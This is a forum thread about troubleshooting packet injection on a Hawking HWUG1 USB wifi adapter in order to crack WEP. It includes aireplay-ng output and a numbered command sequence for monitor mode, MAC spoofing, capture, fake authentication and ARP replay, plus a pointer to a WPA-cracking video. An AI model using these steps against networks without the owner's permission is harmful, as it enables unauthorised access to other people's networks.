please post what you have done bevor exactly, means which commands do you use?
first try to lower the rate from your wlan using command:
iwconfig rausb0 rate 1M
EDIT: what kind of driver/version you are using?
Hawking HWUG1 Wireless G USB Network Adapter with External SMA Jack packet injection
When i try to crack the wep on my Wifi router it dose not seem to work
This is what i typed
I am sitting 5 feet away from my router the power says 98 in airodump-ng can any one tell me how to fix this if you did not catch the title this is the wifi usb i am using.Code:aireplay-ng -1 0 -a 00:15:F4:A6:54:10 -h 00:11:22:33:44 :66 -e ClareMont rausb0 17:50:13 Waiting for beacon frame (BSSID: 00:15:F9:A6:54:10) on channel 11 17:50:13 Sending Authentication Request (Open System) 17:50:16 Sending Authentication Request (Open System) 17:50:18 Sending Authentication Request (Open System) 17:50:20 Sending Authentication Request (Open System) 17:50:22 Sending Authentication Request (Open System) 17:50:24 Sending Authentication Request (Open System) 17:50:26 Sending Authentication Request (Open System) 17:50:28 Sending Authentication Request (Open System) 17:50:30 Sending Authentication Request (Open System) 17:50:32 Sending Authentication Request (Open System) 17:50:34 Sending Authentication Request (Open System) 17:50:36 Sending Authentication Request (Open System) 17:50:38 Sending Authentication Request (Open System) 17:50:40 Sending Authentication Request (Open System) 17:50:42 Sending Authentication Request (Open System) 17:50:44 Sending Authentication Request (Open System) Attack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled. * Check that the BSSID (-a option) is correct. * Try to change the number of packets (-o option). * The driver/card doesn't support injection. * This attack sometimes fails against some APs. * The card is not on the same channel as the AP. * You're too far from the AP. Get closer, or lower the transmit rate.
Hawking HWUG1 Wireless G USB Network Adapter with External SMA Jack
DNA + hacker = Life hacker
please post what you have done bevor exactly, means which commands do you use?
first try to lower the rate from your wlan using command:
iwconfig rausb0 rate 1M
EDIT: what kind of driver/version you are using?
the commands i used was basically these
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger --mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
7)aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
8)aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
DNA + hacker = Life hacker
I ah the same problem with the same card.
This code works real well. My injection didn't work, but know it is great. It takes 3 minutes before it gets going, but I get about 300 #data per second. Its a great card. Just have to adjust. Thanks for the help!Code:iwconfig rausb0 rate 1M
Go to youtube and search for Crack WPA with Backtrack3 by kivi12k.
It is an excellent video with 2 high quality sources. He also zooms in so the code is easy to read.